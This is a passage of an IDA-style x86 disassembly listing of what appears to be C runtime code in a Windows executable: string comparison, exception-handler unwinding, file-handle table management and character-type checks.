		movzx	cx, byte ptr [eax]
		dec	[ebp+arg_8]
		movzx	ecx, cx
		movzx	edx, cl
		inc	eax
		test	byte ptr [edx+edi+1Dh],	4
		mov	[ebp+arg_0], eax
		jz	short loc_40EE76
		cmp	[ebp+arg_8], ebx
		jnz	short loc_40EE60
		movzx	eax, byte ptr [esi]
		xor	ecx, ecx
		test	byte ptr [eax+edi+1Dh],	4
		jnz	short loc_40EEB9
		movzx	eax, ax
		jmp	short loc_40EEA6
; ---------------------------------------------------------------------------

loc_40EE60:				; CODE XREF: sub_40ED77+D6j
		mov	al, [eax]
		cmp	al, bl
		jnz	short loc_40EE6A
		xor	ecx, ecx
		jmp	short loc_40EE76
; ---------------------------------------------------------------------------

loc_40EE6A:				; CODE XREF: sub_40ED77+EDj
		xor	edx, edx
		inc	[ebp+arg_0]
		mov	dh, cl
		mov	dl, al
		movzx	ecx, dx

loc_40EE76:				; CODE XREF: sub_40ED77+D1j
					; sub_40ED77+F1j
		movzx	ax, byte ptr [esi]
		movzx	eax, ax
		movzx	edx, al
		inc	esi
		test	byte ptr [edx+edi+1Dh],	4
		jz	short loc_40EEA6
		cmp	[ebp+arg_8], ebx
		jnz	short loc_40EE91

loc_40EE8D:				; CODE XREF: sub_40ED77+121j
		xor	eax, eax
		jmp	short loc_40EEA6
; ---------------------------------------------------------------------------

loc_40EE91:				; CODE XREF: sub_40ED77+114j
		mov	dl, [esi]
		dec	[ebp+arg_8]
		cmp	dl, bl
		jz	short loc_40EE8D
		xor	ebx, ebx
		mov	bh, al
		inc	esi
		mov	bl, dl
		movzx	eax, bx
		xor	ebx, ebx

loc_40EEA6:				; CODE XREF: sub_40ED77+E7j
					; sub_40ED77+10Fj ...
		cmp	ax, cx
		jnz	short loc_40EECC
		cmp	cx, bx
		jz	short loc_40EEB9
		cmp	[ebp+arg_8], ebx
		jnz	loc_40EE2F

loc_40EEB9:				; CODE XREF: sub_40ED77+E2j
					; sub_40ED77+137j
		cmp	[ebp+var_4], bl
		jz	short loc_40EEC5
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40EEC5:				; CODE XREF: sub_40ED77+145j
		xor	eax, eax

loc_40EEC7:				; CODE XREF: sub_40ED77+B3j
					; sub_40ED77+15Ej ...
		pop	esi

loc_40EEC8:				; CODE XREF: sub_40ED77+3Dj
					; sub_40ED77+4Aj ...
		pop	edi

loc_40EEC9:				; CODE XREF: sub_40ED77+10j
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_40EECC:				; CODE XREF: sub_40ED77+132j
		sbb	eax, eax
		and	eax, 2
		dec	eax
		cmp	[ebp+var_4], bl
		jz	short loc_40EEC7
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh
		jmp	short loc_40EEC7
sub_40ED77	endp


; =============== S U B	R O U T	I N E =======================================



sub_40EEE0	proc near		; CODE XREF: sub_4085AF+1D1p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	0
		push	[esp+4+arg_8]
		push	[esp+8+arg_4]
		push	[esp+0Ch+arg_0]
		call	sub_40ED77
		add	esp, 10h
		retn
sub_40EEE0	endp

; ---------------------------------------------------------------------------
		align 4
		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		push	edi
		push	ebp
		push	0
		push	0
		push	offset loc_40EF10
		push	dword ptr [ebp+8]
		call	sub_413D26

loc_40EF10:				; DATA XREF: .text:0040EF03o
		pop	ebp
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_40EF18:				; DATA XREF: sub_40EF5D+Bo
					; .text:0040EFEAo
		mov	ecx, [esp+4]
		test	dword ptr [ecx+4], 6
		mov	eax, 1
		jz	short locret_40EF5C
		mov	eax, [esp+14h]
		mov	ecx, [eax-4]
		xor	ecx, eax
		call	sub_402AD0
		push	ebp
		mov	ebp, [eax+10h]
		mov	edx, [eax+28h]
		push	edx
		mov	edx, [eax+24h]
		push	edx
		call	sub_40EF5D
		add	esp, 8
		pop	ebp
		mov	eax, [esp+8]
		mov	edx, [esp+10h]
		mov	[edx], eax
		mov	eax, 3

locret_40EF5C:				; CODE XREF: .text:0040EF28j
		retn

; =============== S U B	R O U T	I N E =======================================



sub_40EF5D	proc near		; CODE XREF: .text:0040EF44p

var_20		= dword	ptr -20h
var_18		= dword	ptr -18h
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebx
		push	esi
		push	edi
		mov	eax, [esp+0Ch+arg_0]
		push	ebp
		push	eax
		push	0FFFFFFFEh
		push	offset loc_40EF18
		push	large dword ptr	fs:0
		mov	eax, dword_423064
		xor	eax, esp
		push	eax
		lea	eax, [esp+24h+var_20]
		mov	large fs:0, eax

loc_40EF86:				; CODE XREF: sub_40EF5D:loc_40EFCDj
		mov	eax, [esp+24h+arg_0]
		mov	ebx, [eax+8]
		mov	esi, [eax+0Ch]
		cmp	esi, 0FFFFFFFFh
		jz	short loc_40EFCF
		cmp	[esp+24h+arg_4], 0FFFFFFFFh
		jz	short loc_40EFA2
		cmp	esi, [esp+24h+arg_4]
		jbe	short loc_40EFCF

loc_40EFA2:				; CODE XREF: sub_40EF5D+3Dj
		lea	esi, [esi+esi*2]
		mov	ecx, [ebx+esi*4]
		mov	[esp+24h+var_18], ecx
		mov	[eax+0Ch], ecx
		cmp	dword ptr [ebx+esi*4+4], 0
		jnz	short loc_40EFCD
		push	101h
		mov	eax, [ebx+esi*4+8]
		call	sub_40F00D
		mov	eax, [ebx+esi*4+8]
		call	sub_40F02C

loc_40EFCD:				; CODE XREF: sub_40EF5D+57j
		jmp	short loc_40EF86
; ---------------------------------------------------------------------------

loc_40EFCF:				; CODE XREF: sub_40EF5D+36j
					; sub_40EF5D+43j
		mov	ecx, [esp+24h+var_20]
		mov	large fs:0, ecx
		add	esp, 18h
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_40EF5D	endp

; ---------------------------------------------------------------------------
		xor	eax, eax
		mov	ecx, large fs:0
		cmp	dword ptr [ecx+4], offset loc_40EF18
		jnz	short locret_40F003
		mov	edx, [ecx+0Ch]
		mov	edx, [edx+0Ch]
		cmp	[ecx+8], edx
		jnz	short locret_40F003
		mov	eax, 1

locret_40F003:				; CODE XREF: .text:0040EFF1j
					; .text:0040EFFCj
		retn

; =============== S U B	R O U T	I N E =======================================



sub_40F004	proc near		; CODE XREF: sub_40C2A0+1Ep
					; sub_40C2A0+40p
		push	ebx
		push	ecx
		mov	ebx, offset dword_423FB0
		jmp	short loc_40F018
sub_40F004	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F00D	proc near		; CODE XREF: sub_408978+6Ep
					; sub_4069F0+2099p ...

arg_0		= dword	ptr  4

		push	ebx
		push	ecx
		mov	ebx, offset dword_423FB0
		mov	ecx, [esp+8+arg_0]

loc_40F018:				; CODE XREF: sub_40F004+7j
		mov	[ebx+8], ecx
		mov	[ebx+4], eax
		mov	[ebx+0Ch], ebp
		push	ebp
		push	ecx
		push	eax
		pop	eax
		pop	ecx
		pop	ebp
		pop	ecx
		pop	ebx
		retn	4
sub_40F00D	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F02C	proc near		; CODE XREF: sub_408978+7Bp
					; sub_40EF5D+6Bp
		call	eax
		retn
sub_40F02C	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F02F	proc near		; CODE XREF: sub_40E422+2BBp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	eax, [esp+arg_0]
		test	eax, eax
		push	esi
		push	edi
		jl	short loc_40F093
		cmp	eax, dword_4352E8
		jnb	short loc_40F093
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, eax
		sar	ecx, 5
		lea	edi, ds:435300h[ecx*4]
		mov	ecx, [edi]
		cmp	dword ptr [esi+ecx], 0FFFFFFFFh
		jnz	short loc_40F093
		cmp	dword_423050, 1
		push	ebx
		mov	ebx, [esp+0Ch+arg_4]
		jnz	short loc_40F089
		sub	eax, 0
		jz	short loc_40F080
		dec	eax
		jz	short loc_40F07B
		dec	eax
		jnz	short loc_40F089
		push	ebx
		push	0FFFFFFF4h
		jmp	short loc_40F083
; ---------------------------------------------------------------------------

loc_40F07B:				; CODE XREF: sub_40F02F+42j
		push	ebx
		push	0FFFFFFF5h
		jmp	short loc_40F083
; ---------------------------------------------------------------------------

loc_40F080:				; CODE XREF: sub_40F02F+3Fj
		push	ebx
		push	0FFFFFFF6h

loc_40F083:				; CODE XREF: sub_40F02F+4Aj
					; sub_40F02F+4Fj
		call	ds:off_41D0B8

loc_40F089:				; CODE XREF: sub_40F02F+3Aj
					; sub_40F02F+45j
		mov	eax, [edi]
		mov	[esi+eax], ebx
		xor	eax, eax
		pop	ebx
		jmp	short loc_40F0A9
; ---------------------------------------------------------------------------

loc_40F093:				; CODE XREF: sub_40F02F+8j
					; sub_40F02F+10j ...
		call	sub_405B83
		mov	dword ptr [eax], 9
		call	sub_405B96
		and	dword ptr [eax], 0
		or	eax, 0FFFFFFFFh

loc_40F0A9:				; CODE XREF: sub_40F02F+62j
		pop	edi
		pop	esi
		retn
sub_40F02F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F0AC	proc near		; CODE XREF: sub_408DFD+62p

arg_0		= dword	ptr  4

		mov	ecx, [esp+arg_0]
		push	ebx
		xor	ebx, ebx
		cmp	ecx, ebx
		push	esi
		push	edi
		jl	short loc_40F114
		cmp	ecx, dword_4352E8
		jnb	short loc_40F114
		mov	esi, ecx
		and	esi, 1Fh
		imul	esi, 28h
		mov	eax, ecx
		sar	eax, 5
		lea	edi, ds:435300h[eax*4]
		mov	eax, [edi]
		add	eax, esi
		test	byte ptr [eax+4], 1
		jz	short loc_40F114
		cmp	dword ptr [eax], 0FFFFFFFFh
		jz	short loc_40F114
		cmp	dword_423050, 1
		jnz	short loc_40F10A
		sub	ecx, ebx
		jz	short loc_40F101
		dec	ecx
		jz	short loc_40F0FC
		dec	ecx
		jnz	short loc_40F10A
		push	ebx
		push	0FFFFFFF4h
		jmp	short loc_40F104
; ---------------------------------------------------------------------------

loc_40F0FC:				; CODE XREF: sub_40F0AC+46j
		push	ebx
		push	0FFFFFFF5h
		jmp	short loc_40F104
; ---------------------------------------------------------------------------

loc_40F101:				; CODE XREF: sub_40F0AC+43j
		push	ebx
		push	0FFFFFFF6h

loc_40F104:				; CODE XREF: sub_40F0AC+4Ej
					; sub_40F0AC+53j
		call	ds:off_41D0B8

loc_40F10A:				; CODE XREF: sub_40F0AC+3Fj
					; sub_40F0AC+49j
		mov	eax, [edi]
		or	dword ptr [esi+eax], 0FFFFFFFFh
		xor	eax, eax
		jmp	short loc_40F129
; ---------------------------------------------------------------------------

loc_40F114:				; CODE XREF: sub_40F0AC+Bj
					; sub_40F0AC+13j ...
		call	sub_405B83
		mov	dword ptr [eax], 9
		call	sub_405B96
		mov	[eax], ebx
		or	eax, 0FFFFFFFFh

loc_40F129:				; CODE XREF: sub_40F0AC+66j
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_40F0AC	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F12D	proc near		; CODE XREF: sub_408DFD+7p
					; sub_408DFD+2Fp ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40F14D
		call	sub_405B96
		and	dword ptr [eax], 0
		call	sub_405B83
		mov	dword ptr [eax], 9
		or	eax, 0FFFFFFFFh
		retn
; ---------------------------------------------------------------------------

loc_40F14D:				; CODE XREF: sub_40F12D+7j
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jl	short loc_40F176
		cmp	eax, dword_4352E8
		jnb	short loc_40F176
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_435300[ecx*4]
		add	eax, ecx
		test	byte ptr [eax+4], 1
		jnz	short loc_40F19A

loc_40F176:				; CODE XREF: sub_40F12D+25j
					; sub_40F12D+2Dj
		call	sub_405B96
		mov	[eax], esi
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 9
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_40F19A:				; CODE XREF: sub_40F12D+47j
		mov	eax, [eax]
		pop	esi
		retn
sub_40F12D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F19E	proc near		; CODE XREF: sub_408E91+7Fp
					; sub_40A6FF+7Fp ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_421B90
		call	__SEH_prolog4
		mov	edi, [ebp+arg_0]
		mov	eax, edi
		sar	eax, 5
		mov	esi, edi
		and	esi, 1Fh
		imul	esi, 28h
		add	esi, dword_435300[eax*4]
		mov	[ebp+var_1C], 1
		xor	ebx, ebx
		cmp	[esi+8], ebx
		jnz	short loc_40F205
		push	0Ah
		call	sub_405DA7
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		cmp	[esi+8], ebx
		jnz	short loc_40F1F9
		push	0FA0h
		lea	eax, [esi+0Ch]
		push	eax
		call	sub_40CEC4
		pop	ecx
		pop	ecx
		test	eax, eax
		jnz	short loc_40F1F6
		mov	[ebp+var_1C], ebx

loc_40F1F6:				; CODE XREF: sub_40F19E+53j
		inc	dword ptr [esi+8]

loc_40F1F9:				; CODE XREF: sub_40F19E+3Fj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40F235

loc_40F205:				; CODE XREF: sub_40F19E+2Fj
		cmp	[ebp+var_1C], ebx
		jz	short loc_40F227
		mov	eax, edi
		sar	eax, 5
		and	edi, 1Fh
		imul	edi, 28h
		mov	eax, dword_435300[eax*4]
		lea	eax, [eax+edi+0Ch]
		push	eax
		call	ds:dword_41D164	; RtlEnterCriticalSection

loc_40F227:				; CODE XREF: sub_40F19E+6Aj
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_40F19E	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F230	proc near		; DATA XREF: _1fieagrn:00421BA8o
		xor	ebx, ebx
		mov	edi, [ebp+8]
sub_40F230	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40F235	proc near		; CODE XREF: sub_40F19E+62p
		push	0Ah
		call	sub_405CCF
		pop	ecx
		retn
sub_40F235	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F23E	proc near		; CODE XREF: sub_408F54+3p
					; sub_40A7D1+3p ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		mov	ecx, eax
		and	eax, 1Fh
		imul	eax, 28h
		sar	ecx, 5
		mov	ecx, dword_435300[ecx*4]
		lea	eax, [ecx+eax+0Ch]
		push	eax
		call	ds:dword_41D168	; RtlLeaveCriticalSection
		retn
sub_40F23E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F260	proc near		; CODE XREF: sub_40E422:loc_40E618p

var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

; FUNCTION CHUNK AT 0040F33C SIZE 000000BA BYTES

		push	18h
		push	offset dword_421BB0
		call	__SEH_prolog4
		or	[ebp+var_1C], 0FFFFFFFFh
		xor	edi, edi
		mov	[ebp+var_24], edi
		push	0Bh
		call	sub_405CE4
		pop	ecx
		test	eax, eax
		jnz	short loc_40F289
		or	eax, 0FFFFFFFFh
		jmp	loc_40F3F0
; ---------------------------------------------------------------------------

loc_40F289:				; CODE XREF: sub_40F260+1Fj
		push	0Bh
		call	sub_405DA7
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi

loc_40F294:				; CODE XREF: sub_40F260+109j
		mov	[ebp+var_28], edi
		cmp	edi, 40h
		jge	loc_40F3E1
		mov	esi, dword_435300[edi*4]
		test	esi, esi
		jz	loc_40F36E

loc_40F2AF:				; CODE XREF: sub_40F260+CBj
		mov	[ebp+var_20], esi
		mov	eax, dword_435300[edi*4]
		add	eax, 500h
		cmp	esi, eax
		jnb	loc_40F362
		test	byte ptr [esi+4], 1
		jnz	short loc_40F328
		cmp	dword ptr [esi+8], 0
		jnz	short loc_40F30B
		push	0Ah
		call	sub_405DA7
		pop	ecx
		xor	ebx, ebx
		inc	ebx
		mov	[ebp+ms_exc.disabled], ebx
		cmp	dword ptr [esi+8], 0
		jnz	short loc_40F302
		push	0FA0h
		lea	eax, [esi+0Ch]
		push	eax
		call	sub_40CEC4
		pop	ecx
		pop	ecx
		test	eax, eax
		jnz	short loc_40F2FF
		mov	[ebp+var_24], ebx
		jmp	short loc_40F302
; ---------------------------------------------------------------------------

loc_40F2FF:				; CODE XREF: sub_40F260+98j
		inc	dword ptr [esi+8]

loc_40F302:				; CODE XREF: sub_40F260+84j
					; sub_40F260+9Dj
		and	[ebp+ms_exc.disabled], 0
		call	sub_40F333

loc_40F30B:				; CODE XREF: sub_40F260+70j
		cmp	[ebp+var_24], 0
		jnz	short loc_40F328
		lea	ebx, [esi+0Ch]
		push	ebx
		call	ds:dword_41D164	; RtlEnterCriticalSection
		test	byte ptr [esi+4], 1
		jz	short loc_40F33C
		push	ebx
		call	ds:dword_41D168	; RtlLeaveCriticalSection

loc_40F328:				; CODE XREF: sub_40F260+6Aj
					; sub_40F260+AFj ...
		add	esi, 28h
		jmp	short loc_40F2AF
sub_40F260	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F32D	proc near		; DATA XREF: _1fieagrn:00421BD4o
		mov	edi, [ebp-28h]
		mov	esi, [ebp-20h]
sub_40F32D	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40F333	proc near		; CODE XREF: sub_40F260+A6p
		push	0Ah
		call	sub_405CCF
		pop	ecx
		retn
sub_40F333	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_40F260

loc_40F33C:				; CODE XREF: sub_40F260+BFj
		cmp	[ebp+var_24], 0
		jnz	short loc_40F328
		mov	byte ptr [esi+4], 1
		or	dword ptr [esi], 0FFFFFFFFh
		mov	eax, esi
		sub	eax, dword_435300[edi*4]
		cdq
		push	28h
		pop	ecx
		idiv	ecx
		mov	ecx, edi
		shl	ecx, 5
		add	eax, ecx
		mov	[ebp+var_1C], eax

loc_40F362:				; CODE XREF: sub_40F260+60j
		cmp	[ebp+var_1C], 0FFFFFFFFh
		jnz	short loc_40F3E1
		inc	edi
		jmp	loc_40F294
; ---------------------------------------------------------------------------

loc_40F36E:				; CODE XREF: sub_40F260+49j
		push	28h
		push	20h
		call	sub_407B2A
		pop	ecx
		pop	ecx
		mov	[ebp+var_20], eax
		test	eax, eax
		jz	short loc_40F3E1
		lea	ecx, ds:435300h[edi*4]
		mov	[ecx], eax
		add	dword_4352E8, 20h

loc_40F390:				; CODE XREF: sub_40F260+151j
		mov	edx, [ecx]
		add	edx, 500h
		cmp	eax, edx
		jnb	short loc_40F3B3
		mov	byte ptr [eax+4], 0
		or	dword ptr [eax], 0FFFFFFFFh
		mov	byte ptr [eax+5], 0Ah
		and	dword ptr [eax+8], 0
		add	eax, 28h
		mov	[ebp+var_20], eax
		jmp	short loc_40F390
; ---------------------------------------------------------------------------

loc_40F3B3:				; CODE XREF: sub_40F260+13Aj
		shl	edi, 5
		mov	[ebp+var_1C], edi
		mov	eax, edi
		sar	eax, 5
		mov	ecx, edi
		and	ecx, 1Fh
		imul	ecx, 28h
		mov	eax, dword_435300[eax*4]
		mov	byte ptr [eax+ecx+4], 1
		push	edi
		call	sub_40F19E
		pop	ecx
		test	eax, eax
		jnz	short loc_40F3E1
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40F3E1:				; CODE XREF: sub_40F260+3Aj
					; sub_40F260+106j ...
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40F3F6
		mov	eax, [ebp+var_1C]

loc_40F3F0:				; CODE XREF: sub_40F260+24j
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_40F260

; =============== S U B	R O U T	I N E =======================================



sub_40F3F6	proc near		; CODE XREF: sub_40F260+188p
					; DATA XREF: _1fieagrn:00421BC8o
		push	0Bh
		call	sub_405CCF
		pop	ecx
		retn
sub_40F3F6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F3FF	proc near		; CODE XREF: sub_408FEC+31p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	10h
		push	offset dword_421BD8
		call	__SEH_prolog4
		mov	eax, [ebp+arg_0]
		cmp	eax, 0FFFFFFFEh
		jnz	short loc_40F426
		call	sub_405B83
		mov	dword ptr [eax], 9

loc_40F41E:				; CODE XREF: sub_40F3FF+4Dj
		or	eax, 0FFFFFFFFh
		jmp	loc_40F4D0
; ---------------------------------------------------------------------------

loc_40F426:				; CODE XREF: sub_40F3FF+12j
		xor	ebx, ebx
		cmp	eax, ebx
		jl	short loc_40F434
		cmp	eax, dword_4352E8
		jb	short loc_40F44E

loc_40F434:				; CODE XREF: sub_40F3FF+2Bj
					; sub_40F3FF+6Dj
		call	sub_405B83
		mov	dword ptr [eax], 9
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4032F9
		add	esp, 14h
		jmp	short loc_40F41E
; ---------------------------------------------------------------------------

loc_40F44E:				; CODE XREF: sub_40F3FF+33j
		mov	ecx, eax
		sar	ecx, 5
		lea	edi, ds:435300h[ecx*4]
		mov	esi, eax
		and	esi, 1Fh
		imul	esi, 28h
		mov	ecx, [edi]
		movzx	ecx, byte ptr [esi+ecx+4]
		and	ecx, 1
		jz	short loc_40F434
		push	eax
		call	sub_40F19E
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		mov	eax, [edi]
		test	byte ptr [esi+eax+4], 1
		jz	short loc_40F4B2
		push	[ebp+arg_0]
		call	sub_40F12D
		pop	ecx
		push	eax
		call	ds:off_41D0B4
		test	eax, eax
		jnz	short loc_40F4A0
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		mov	[ebp+var_1C], eax
		jmp	short loc_40F4A3
; ---------------------------------------------------------------------------

loc_40F4A0:				; CODE XREF: sub_40F3FF+94j
		mov	[ebp+var_1C], ebx

loc_40F4A3:				; CODE XREF: sub_40F3FF+9Fj
		cmp	[ebp+var_1C], ebx
		jz	short loc_40F4C1
		call	sub_405B96
		mov	ecx, [ebp+var_1C]
		mov	[eax], ecx

loc_40F4B2:				; CODE XREF: sub_40F3FF+80j
		call	sub_405B83
		mov	dword ptr [eax], 9
		or	[ebp+var_1C], 0FFFFFFFFh

loc_40F4C1:				; CODE XREF: sub_40F3FF+A7j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40F4D6
		mov	eax, [ebp+var_1C]

loc_40F4D0:				; CODE XREF: sub_40F3FF+22j
		call	__SEH_epilog4
		retn
sub_40F3FF	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F4D6	proc near		; CODE XREF: sub_40F3FF+C9p
					; DATA XREF: _1fieagrn:00421BF0o
		push	dword ptr [ebp+8]
		call	sub_40F23E
		pop	ecx
		retn
sub_40F4D6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F4E0	proc near		; CODE XREF: sub_40F52F+21p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		mov	eax, [ebp+var_10]
		cmp	dword ptr [eax+0ACh], 1
		jle	short loc_40F510
		lea	eax, [ebp+var_10]
		push	eax
		push	4
		push	[ebp+arg_0]
		call	sub_40CDF4
		add	esp, 0Ch
		jmp	short loc_40F520
; ---------------------------------------------------------------------------

loc_40F510:				; CODE XREF: sub_40F4E0+1Bj
		mov	eax, [eax+0C8h]
		mov	ecx, [ebp+arg_0]
		movzx	eax, byte ptr [eax+ecx*2]
		and	eax, 4

loc_40F520:				; CODE XREF: sub_40F4E0+2Ej
		cmp	[ebp+var_4], 0
		jz	short locret_40F52D
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40F52D:				; CODE XREF: sub_40F4E0+44j
		leave
		retn
sub_40F4E0	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F52F	proc near		; CODE XREF: sub_409217+1B6p
					; sub_409217+3EFp ...

arg_0		= dword	ptr  4

		cmp	dword_427420, 0
		jnz	short loc_40F54A
		mov	eax, [esp+arg_0]
		mov	ecx, off_423668
		movzx	eax, byte ptr [ecx+eax*2]
		and	eax, 4
		retn
; ---------------------------------------------------------------------------

loc_40F54A:				; CODE XREF: sub_40F52F+7j
		push	0
		push	[esp+4+arg_0]
		call	sub_40F4E0
		pop	ecx
		pop	ecx
		retn
sub_40F52F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F558	proc near		; CODE XREF: sub_40F5AC+23p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		mov	eax, [ebp+var_10]
		cmp	dword ptr [eax+0ACh], 1
		jle	short loc_40F58B
		lea	eax, [ebp+var_10]
		push	eax
		push	80h
		push	[ebp+arg_0]
		call	sub_40CDF4
		add	esp, 0Ch
		jmp	short loc_40F59D
; ---------------------------------------------------------------------------

loc_40F58B:				; CODE XREF: sub_40F558+1Bj
		mov	eax, [eax+0C8h]
		mov	ecx, [ebp+arg_0]
		movzx	eax, byte ptr [eax+ecx*2]
		and	eax, 80h

loc_40F59D:				; CODE XREF: sub_40F558+31j
		cmp	[ebp+var_4], 0
		jz	short locret_40F5AA
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40F5AA:				; CODE XREF: sub_40F558+49j
		leave
		retn
sub_40F558	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F5AC	proc near		; CODE XREF: sub_409217+9DFp
					; sub_409217+AB7p

arg_0		= dword	ptr  4

		cmp	dword_427420, 0
		jnz	short loc_40F5C9
		mov	eax, [esp+arg_0]
		mov	ecx, off_423668
		movzx	eax, byte ptr [ecx+eax*2]
		and	eax, 80h
		retn
; ---------------------------------------------------------------------------

loc_40F5C9:				; CODE XREF: sub_40F5AC+7j
		push	0
		push	[esp+4+arg_0]
		call	sub_40F558
		pop	ecx
		pop	ecx
		retn
sub_40F5AC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40F5D7	proc near		; CODE XREF: sub_40F626+21p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		mov	eax, [ebp+var_10]
		cmp	dword ptr [eax+0ACh], 1
		jle	short loc_40F607
		lea	eax, [ebp+var_10]
		push	eax
		push	8
		push	[ebp+arg_0]
		call	sub_40CDF4
		add	esp, 0Ch
		jmp	short loc_40F617
; ---------------------------------------------------------------------------

loc_40F607:				; CODE XREF: sub_40F5D7+1Bj
		mov	eax, [eax+0C8h]
		mov	ecx, [ebp+arg_0]
		movzx	eax, byte ptr [eax+ecx*2]
		and	eax, 8

loc_40F617:				; CODE XREF: sub_40F5D7+2Ej
		cmp	[ebp+var_4], 0
		jz	short locret_40F624
		mov	ecx, [ebp+var_8]
		and	dword ptr [ecx+70h], 0FFFFFFFDh

locret_40F624:				; CODE XREF: sub_40F5D7+44j
		leave
		retn
sub_40F5D7	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F626	proc near		; CODE XREF: sub_4091F2+17p
					; sub_409217+13Cp ...

arg_0		= dword	ptr  4

		cmp	dword_427420, 0
		jnz	short loc_40F641
		mov	eax, [esp+arg_0]
		mov	ecx, off_423668
		movzx	eax, byte ptr [ecx+eax*2]
		and	eax, 8
		retn
; ---------------------------------------------------------------------------

loc_40F641:				; CODE XREF: sub_40F626+7j
		push	0
		push	[esp+4+arg_0]
		call	sub_40F5D7
		pop	ecx
		pop	ecx
		retn
sub_40F626	endp


; =============== S U B	R O U T	I N E =======================================



sub_40F64F	proc near		; CODE XREF: sub_409217+15Ep
					; sub_409217+5BEp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ebx
		push	ebp
		push	esi
		mov	esi, [esp+0Ch+arg_4]
		or	ebp, 0FFFFFFFFh
		test	byte ptr [esi+0Ch], 40h
		push	edi
		jnz	loc_40F70C
		push	esi
		call	sub_408DD0
		cmp	eax, ebp
		pop	ecx
		mov	ebx, offset dword_423BD0
		jz	short loc_40F6A2
		push	esi
		call	sub_408DD0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_40F6A2
		push	esi
		call	sub_408DD0
		sar	eax, 5
		push	esi
		lea	edi, ds:435300h[eax*4]
		call	sub_408DD0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		pop	ecx
		pop	ecx
		jmp	short loc_40F6A4
; ---------------------------------------------------------------------------

